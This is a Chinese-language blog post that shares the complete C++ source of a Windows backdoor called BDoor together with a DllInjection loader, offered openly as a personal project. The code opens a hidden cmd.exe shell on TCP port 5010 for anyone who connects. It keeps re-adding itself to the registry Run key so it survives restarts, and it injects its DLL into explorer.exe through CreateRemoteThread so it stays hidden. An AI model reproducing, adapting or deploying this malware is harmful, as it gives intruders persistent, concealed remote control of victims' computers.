后门程序--示例

后门程序BDoor及源码     选择自 amh 的 Blog

提交时间:2005-04-22
提交用户:ffantasyYD
工具分类:后门程序
运行平台:Windows
工具大小:316825 Bytes
文件MD5 :95e120d97967a3679dfdbd82985ea1ca
工具来源:http://www.uestc.edu.cn/web/default.aspx

这是本人考研后的第一个作品(其实是很简陋的一个东西),拿出来共享,算是纪念考研成功吧!开放源代码,让大虾们见笑了。

>> 下载 <<

 

// BDoor.cpp : Defines the entry point for the DLL application.
//

#include "stdafx.h"
#include "winsock2.h"

#pragma comment(lib,"ws2_32")

#define PORT 5010
#define REG_RUN "SOFTWARE//Microsoft//Windows//CurrentVersion//Run"

struct THREADPARAM
{
 SOCKET sock;
 HANDLE handle;
};

DWORD WINAPI ControlThread(void *no);
DWORD WINAPI BDoor(void *lp);
DWORD WINAPI RecvThread(void *lp);
DWORD WINAPI SendThread(void *lp);
DWORD WINAPI WriteReg(void *no);

BOOL APIENTRY DllMain( HANDLE hModule, 
                       DWORD  ul_reason_for_call, 
                       LPVOID lpReserved
      )
{
 switch (ul_reason_for_call)
 {
  case DLL_PROCESS_ATTACH:
  {
   ::CreateThread(NULL,0,ControlThread,NULL,0,NULL);
   break;
  }

     case DLL_PROCESS_DETACH:
  {
   break;
  }
 }
    return TRUE;
}

DWORD WINAPI ControlThread(void *no)
{
 CreateThread(NULL,0,WriteReg,NULL,0,NULL);

 WSADATA wsaData;
    SOCKET listenSock;
 if(::WSAStartup(MAKEWORD(2,2),&wsaData)!=0)
 {
  return -1;
 }

 if((listenSock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET)
 {
  return -1;
 }

 sockaddr_in localAddr,inAddr;
 int addrLen=sizeof(inAddr);
 
 localAddr.sin_addr.S_un.S_addr=0;
 localAddr.sin_family=AF_INET;
 localAddr.sin_port=htons(PORT);
 if(bind(listenSock,(sockaddr *)&localAddr,sizeof(localAddr))==SOCKET_ERROR)
 {
  closesocket(listenSock);
  return -1;
 }
 listen(listenSock,5);

 while(TRUE)
 {
  SOCKET acceptSock=accept(listenSock,(sockaddr *)&inAddr,&addrLen);
  DWORD ID;
  CreateThread(NULL,0,BDoor,&acceptSock,0,&ID);
  Sleep(100);
 }

 closesocket(listenSock);
 ::WSACleanup();
}

DWORD WINAPI WriteReg(void *no)
{
 char sysPath[MAX_PATH]={0};
 int ret=::GetSystemDirectory(sysPath,MAX_PATH);
 if(sysPath[ret-1]!='//')
  strcat(sysPath,"//");
 strcat(sysPath,"DllInjection.exe");
 int len=strlen(sysPath);
 while(TRUE)
 {
  HKEY hKey;
  if(::RegOpenKey(HKEY_LOCAL_MACHINE,REG_RUN,&hKey)!=ERROR_SUCCESS)
   continue;
  ::RegSetValueEx(hKey,"sysDll",0,REG_SZ,(BYTE *)sysPath,len);

  ::RegCloseKey(hKey);
  Sleep(5000);
 }
 return 0;
}

DWORD WINAPI BDoor(void *lp)
{
 SOCKET sock=*((SOCKET *)lp);
 HANDLE hCmdOut,hCmdIn,hRead,hWrite;

 SECURITY_ATTRIBUTES sec={0};
 sec.nLength=sizeof(sec);
 sec.lpSecurityDescriptor=NULL;
 sec.bInheritHandle=TRUE;
 CreatePipe(&hCmdIn,&hWrite,&sec,0);
 CreatePipe(&hRead,&hCmdOut,&sec,0);

 char cmdDir[MAX_PATH]={0};
 ::GetSystemDirectory(cmdDir,MAX_PATH);
 if(cmdDir[strlen(cmdDir)-1]!='//')
  strcat(cmdDir,"//");
 strcat(cmdDir,"cmd.exe");

 STARTUPINFO startUpInfo={0};
 startUpInfo.cb=sizeof(startUpInfo);
 startUpInfo.dwFlags=STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
 startUpInfo.wShowWindow=SW_HIDE;
 startUpInfo.hStdError=startUpInfo.hStdOutput=hCmdOut;
 startUpInfo.hStdInput=hCmdIn;

 PROCESS_INFORMATION processInfo={0};
 int ret=CreateProcess(cmdDir,NULL,NULL,NULL,TRUE,0,NULL,NULL,&startUpInfo,&processInfo);
 if(ret==0)
 {
  return -1;
 }
 CloseHandle(hCmdIn);
 CloseHandle(hCmdOut);

 DWORD ID1,ID2;
 HANDLE hRecvThread,hSendThread;
 THREADPARAM recvParam={0},sendParam={0};

 recvParam.sock=sock;
 recvParam.handle=hWrite;
 hRecvThread=CreateThread(NULL,0,RecvThread,&recvParam,0,&ID1);

 sendParam.sock=sock;
 sendParam.handle=hRead;
 hSendThread=CreateThread(NULL,0,SendThread,&sendParam,0,&ID2);

 ULONG code;
 ::WaitForSingleObject(hRecvThread,INFINITE);
 ::GetExitCodeThread(hSendThread,&code);
 ::TerminateThread(hSendThread,code);
 ::GetExitCodeProcess(processInfo.hProcess,&code);
 ::TerminateProcess(processInfo.hProcess,code);
 closesocket(sock);
 CloseHandle(hWrite);
 CloseHandle(hRead);
 return 0;
}

DWORD WINAPI RecvThread(void *lp)
{
 char cmd[256]={0};
 THREADPARAM param=*((THREADPARAM *)lp);
 while(1)
 {
  char temp[2]={0};
  int ret=recv(param.sock,temp,1,0);
  if(ret==0)
  {
   break;
  }
  else if(ret==1)
  {
   send(param.sock,temp,1,0);
   strcat(cmd,temp);
   if(temp[0]=='/n')
   {
    if(_stricmp(cmd,"exit/r/n")==0)
    {
     break;
    }
    ULONG len;
    ::WriteFile(param.handle,cmd,strlen(cmd),&len,NULL);
    memset(cmd,0,256);
   }
  }
 }
 return 0;
}

DWORD WINAPI SendThread(void *lp)
{
 THREADPARAM param=*((THREADPARAM *)lp);
 char buf[1024]={0};
 while(1)
 {
  ULONG len=0;
  ::PeekNamedPipe(param.handle,buf,1024,&len,NULL,NULL);
  if(len>0)
  {
   ::ReadFile(param.handle,buf,1024,&len,NULL);
   send(param.sock,buf,len,0);
   memset(buf,0,1024);
  }
  Sleep(100);
 }
 return 0;
}

 

----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

 

// DllInjection.cpp : Defines the entry point for the application.
//

#include "stdafx.h"
#include "windows.h"
#include "stdlib.h"
#include "tlhelp32.h"
#include "io.h"

long GetProcessID(char *processName);

int APIENTRY WinMain(HINSTANCE hInstance,
                     HINSTANCE hPrevInstance,
                     LPSTR     lpCmdLine,
                     int       nCmdShow)
{
  // TODO: Place code here.
 Sleep(5000);
 long ID=GetProcessID("explorer");
 if(ID==-1)
  return -1;

 HINSTANCE hDll;
 HINSTANCE (* pProc)(LPCTSTR);
 DWORD (WINAPI * pThreadProc)(void *);
 if((hDll=::LoadLibrary("kernel32.dll"))==NULL)
  return -1;
 if((pProc=(HINSTANCE (*)(LPCTSTR))::GetProcAddress(hDll,"LoadLibraryA"))==NULL)
  return -1;
 pThreadProc=(DWORD (WINAPI *)(void *))pProc;

 HANDLE hProcess=::OpenProcess(PROCESS_ALL_ACCESS,TRUE,ID);
 if(hProcess==NULL)
  return -1;

 char pDllPath[MAX_PATH]={0};
 char *pRemoteAddr=NULL;
 int ret=::GetSystemDirectory(pDllPath,MAX_PATH);
 if(pDllPath[ret-1]!='//')
  strcat(pDllPath,"//");
 strcat(pDllPath,"BDoor.dll");
 if(::_access(pDllPath,0)==-1)
  return -1;
 
 pRemoteAddr=(char*)::VirtualAllocEx(hProcess,NULL,strlen(pDllPath)+1,MEM_COMMIT,PAGE_READWRITE);
 if(pRemoteAddr==NULL)
  return -1;
 ret=::WriteProcessMemory(hProcess,pRemoteAddr,pDllPath,strlen(pDllPath),NULL);
 if(ret==0)
  return -1;
 
 HANDLE hRemoteThread=::CreateRemoteThread(hProcess,NULL,0,pThreadProc,pRemoteAddr,0,NULL);

 Sleep(100);
 ::VirtualFreeEx(hProcess,pRemoteAddr,strlen(pDllPath)+1,MEM_DECOMMIT);
 ::CloseHandle(hProcess);
 return 0;
}

long GetProcessID(char *processName)
{
 HANDLE hSnapshot; 
 PROCESSENTRY32 pe32={0}; 
 BOOL fRet;

 hSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); 
 if(hSnapshot==NULL) 
  return -1;

 pe32.dwSize=sizeof(PROCESSENTRY32); 
 fRet=Process32First(hSnapshot,&pe32); 
 if(!fRet) 
  return -1;

 int g=0;
 char drive[_MAX_DRIVE]={0};
 char dir[_MAX_DIR]={0};
 char fname[_MAX_FNAME]={0};
 char ext[_MAX_EXT]={0};
 do 
 { 
  _splitpath(pe32.szExeFile,drive,dir,fname,ext);
  if(_stricmp(processName,fname)==0)
  {
   g=1;
   break;
  }
 }while(Process32Next(hSnapshot,&pe32));
 if(g!=1)
  return -1;

 return pe32.th32ProcessID;
}

 

你可能感兴趣的:(socket,cmd,null,Path,attributes,winapi)